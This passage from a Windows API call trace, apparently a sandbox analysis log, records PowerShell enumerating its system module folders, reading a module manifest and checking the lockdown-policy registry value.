nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\", lpFilePart=0x0) returned 0x3d [0182.471] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\*", lpFindFileData=0x1b7dd830 | out: lpFindFileData=0x1b7dd830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b67e0 [0182.471] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.472] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0182.472] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0182.472] FindClose (in: hFindFile=0x1a9b67e0 | out: hFindFile=0x1a9b67e0) returned 1 [0182.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddae0) returned 1 [0182.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddaa0) returned 1 [0182.472] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0182.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0182.473] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0182.473] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6ae0 [0182.473] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.473] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0182.473] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0182.473] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0182.474] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0182.474] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.474] FindClose (in: hFindFile=0x1a9b6ae0 | out: hFindFile=0x1a9b6ae0) returned 1 [0182.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0182.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0182.474] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6b40 [0182.475] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.475] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0182.475] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0182.475] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0182.475] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0182.476] FindNextFileW (in: hFindFile=0x1a9b6b40, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0182.476] FindClose (in: hFindFile=0x1a9b6b40 | out: hFindFile=0x1a9b6b40) returned 1 [0182.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7dd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0182.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb60) returned 1 [0182.476] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddc40 | out: lpFileInformation=0x1b7ddc40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0182.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb20) returned 1 [0182.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb90) returned 1 [0182.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0x1b7dd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0182.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\", lpFilePart=0x0) returned 0x38 [0182.476] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\*", lpFindFileData=0x1b7dd830 | out: lpFindFileData=0x1b7dd830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b68a0 [0182.477] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.477] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0182.477] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0182.478] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0182.478] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0182.478] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.478] FindClose (in: hFindFile=0x1a9b68a0 | out: hFindFile=0x1a9b68a0) returned 1 [0182.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddae0) returned 1 [0182.478] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0182.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.504] CoTaskMemAlloc (cb=0x20c) returned 0x1a9aec00 [0182.504] GetSystemDirectoryW (in: lpBuffer=0x1a9aec00, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0182.504] CoTaskMemFree (pv=0x1a9aec00) [0182.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7dd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0182.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7dd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0182.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddc10 | out: lpFileInformation=0x1b7ddc10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0182.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddaf0) returned 1 [0182.505] WldpGetLockdownPolicy () returned 0x0 [0182.505] GetSystemInfo (in: lpSystemInfo=0x1b7ddc70 | out: lpSystemInfo=0x1b7ddc70*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0182.505] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7ddb78 | out: phkResult=0x1b7ddb78*=0x6cc) returned 0x0 [0182.506] RegQueryValueExW (in: hKey=0x6cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7ddbc8, lpData=0x0, lpcbData=0x1b7ddbc0*=0x0 | out: lpType=0x1b7ddbc8*=0x0, lpData=0x0, lpcbData=0x1b7ddbc0*=0x0) returned 0x2 [0182.506] RegCloseKey (hKey=0x6cc) returned 0x0 [0182.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0182.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dda40) returned 1 [0182.507] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6cc [0182.507] GetFileType (hFile=0x6cc) returned 0x1 [0182.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd9b0) returned 1 [0182.507] GetFileType (hFile=0x6cc) returned 0x1 [0182.508] SetFilePointer (in: hFile=0x6cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dd9f8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dd9f8*=0) returned 0x0 [0182.508] ReadFile (in: hFile=0x6cc, lpBuffer=0x2404c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda78, lpOverlapped=0x0 | out: lpBuffer=0x2404c28*, lpNumberOfBytesRead=0x1b7dda78*=0x950, lpOverlapped=0x0) returned 1 [0182.511] SetFilePointer (in: hFile=0x6cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dd9f8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dd9f8*=0) returned 0x950 [0182.511] ReadFile (in: hFile=0x6cc, lpBuffer=0x24040e0, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x1b7dda78, lpOverlapped=0x0 | out: lpBuffer=0x24040e0*, lpNumberOfBytesRead=0x1b7dda78*=0x0, lpOverlapped=0x0) returned 1 [0182.511] SetFilePointer (in: hFile=0x6cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7dd9f8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7dd9f8*=0) returned 0x950 [0182.511] ReadFile (in: hFile=0x6cc, lpBuffer=0x2404c28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda78, lpOverlapped=0x0 | out: lpBuffer=0x2404c28*, lpNumberOfBytesRead=0x1b7dda78*=0x0, lpOverlapped=0x0) returned 1 [0182.511] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b1f00 [0182.511] GetSystemDirectoryW (in: lpBuffer=0x1a9b1f00, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0182.511] CoTaskMemFree (pv=0x1a9b1f00) [0182.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7dd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0182.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7dd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0182.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd990) returned 1 [0182.511] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7dda70 | out: lpFileInformation=0x1b7dda70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0182.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd950) returned 1 [0182.512] WldpGetLockdownPolicy () returned 0x0 [0182.512] GetSystemInfo (in: lpSystemInfo=0x1b7ddad0 | out: lpSystemInfo=0x1b7ddad0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0182.512] RegOpenKeyExW 